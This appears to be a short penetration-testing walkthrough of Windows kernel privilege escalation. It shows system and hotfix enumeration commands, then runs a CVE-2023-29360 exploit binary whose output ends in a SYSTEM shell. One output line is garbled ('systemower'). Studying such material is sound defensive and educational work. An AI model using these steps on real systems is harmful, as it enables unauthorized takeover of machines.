Exploits

Kernel exploits aim to leverage Windows kernel vulnerabilities and typically result in high privileges, but requires advanced knowledge and carries a high risk of crashing the system.

1. System Info

> systeminfo

Host Name:                 CLIENTWK220
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
...

2. Hotfixes

# enumerate security patches
> Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Source        Description      HotFixID      InstalledBy         InstalledOn
------        -----------      --------      -----------         -----------
              Security Update  KB5025239                         5/4/2023 12:00:00 AM
              Security Update  KB5025749                         5/4/2023 12:00:00 AM
              Security Update  KB5017233                         9/25/2022 12:00:00 AM

3. Exploit

> whoami
clientwk220\steve

> .\CVE-2023-29360.exe
[+] Device Description: Microsoft Streaming Service Proxy
Hardware IDs:
        "SW\{96E080C7-143C-11D1-B40F-00A0C9223196}"
[+] Device Instance ID: SW\{96E080C7-143C-11D1-B40F-00A0C9223196}\{3C0D501A-140B-11D1-B40F-00A0C9223196}
[+] First mapped _MDL: 20c2f3c00c0
[+] Second mapped _MDL: 20c2f3d0040
[+] Unprivileged token reference: ffffbc053be6d06d
[+] System token reference: ffffbc052ea7d496
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

>whoami
nt authority\systemower

Vulnerabities on Windows OS systems can be found on the Security Update Guide, such as CVE-2023-29360, and their corresponding security updates can be shown on the Microsoft Update Catalog page.